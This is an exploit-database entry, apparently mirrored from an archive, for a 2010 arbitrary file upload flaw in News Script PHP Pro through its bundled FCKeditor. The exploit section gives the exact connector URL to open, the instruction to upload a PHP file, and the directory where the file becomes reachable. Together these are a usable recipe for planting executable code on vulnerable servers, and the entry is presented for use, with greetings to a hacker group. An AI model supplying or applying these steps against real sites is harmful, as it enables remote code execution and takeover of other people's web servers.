[] NeoSense
E X P L O I T S
title author type platform port cve id

News Script PHP Pro - 'FCKeditor' Arbitrary File Upload

Author: Net.Edit0r
type: webapps
platform: php
port: 
date_added: 2010-12-29 
date_updated: 2010-12-29 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

==============================================================================

        [»] News Script PHP Pro (fckeditor) File Upload Vulnerability

==============================================================================

    [»] Title   :           [ News Script PHP Pro (fckeditor) File Upload Vulnerability ]

    [»] Script  :           [ News Script PHP Pro  ]

    [»] TestedON:           [ linux/php ]

    [»] Download:           [ http://newsscriptphp.com/ ]

    [»] Author  :           [ Net.Edit0r }

    [»] Email   :           [ black.hat.tm@gmail.com ]

    [»] Date    :           [ 2010-12-26 ]

    [»] Version :           [ Full Version ]

    [»] CVE     :           [Web Applications]

###########################################################################


===[ Exploit ]===    ./Iranian HackerZ

  [»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html

  [»] Select the "File Upload" To use = php

===[ Upload To ]===

  [»] http://server/[patch]/userfiles/Name File

===[ Demo ]===

  [»] http://server/news/fckeditor/editor/filemanager/connectors/uploadtest.html

Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor

     BHG : Net.Edit0r ~ Darkcoder ~ keracker

###########################################################################
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.